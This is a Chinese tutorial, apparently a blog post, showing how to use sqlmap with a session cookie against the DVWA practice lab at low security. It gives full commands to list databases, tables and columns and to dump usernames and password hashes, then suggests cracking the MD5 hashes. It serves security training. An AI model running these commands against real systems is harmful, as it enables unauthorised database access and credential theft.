Sqlmap 注入DVWA[low]

0.dvwa要登陆才能访问到带有sql注入的页面,所以我们需要带有cookie注入
参数:--cookie="you cookie"

伪命令:
sqlmap -u "http://www.sxxxx.com/1.php?id=111" --cookie="You cookie"
使用演示:
因为命令太长了,不方便看,我将参数以行间隔,真正使用的时候是不需要用行间隔的
sqlmap 
--url=
"192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#"
--cookie=
"security=low; ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;
echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365"

回显:Sqlmap 注入DVWA[low]_第1张图片

通过sqlmap的回显,可以看出目标站的url是可被注入的,并且给出了操作系统Windows,Web服务器的指纹和使用的数据库指纹

1.获取目标数据库的数据库名


sqlmap参数:--dbs 

sqlmap 
--url="192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#"
--cookie="security=low;
ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;
echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365"
--dbs

回显:
Sqlmap 注入DVWA[low]_第2张图片
sqlmap列出了当前可被查询到的数据库名,用工具获取数据库名我所知道的两种方式,一种是字典猜解,一种Mysql5.0以上版本可以通过自身的nformation_schema数据库来获取数据库中存储的数据库名[这里只是我知道的方式不代表只有2种方式]
2.获取数据库表名

参数:--tables 
sqlmap
--url="192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#" --cookie="security=low; ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;
echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365" 
-D 'dvwa0' 
--tables

回显:
Sqlmap 注入DVWA[low]_第3张图片

3.获取表中的列名[columns]
 

参数:--columns
sqlmap
--url="192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#" --cookie="security=low; ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;
echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365" 
-D 'dvwa0' 
-T 'users' 
--columns

回显:
Sqlmap 注入DVWA[low]_第4张图片
4.获取列中的信息

参数:--dump
sqlmap
--url="192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#" --cookie="security=low; ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365" 
-D 'dvwa0' 
-T 'users' 
-C 'user,password' 
--dump

回显:

Sqlmap 注入DVWA[low]_第5张图片

sql注入得到数据 基础的大概就分为5步

1.得到数据库名=》2.得到表名=》3.得到列名=》4.得到数据=》5.跑MD5
 

你可能感兴趣的:(Web,渗透)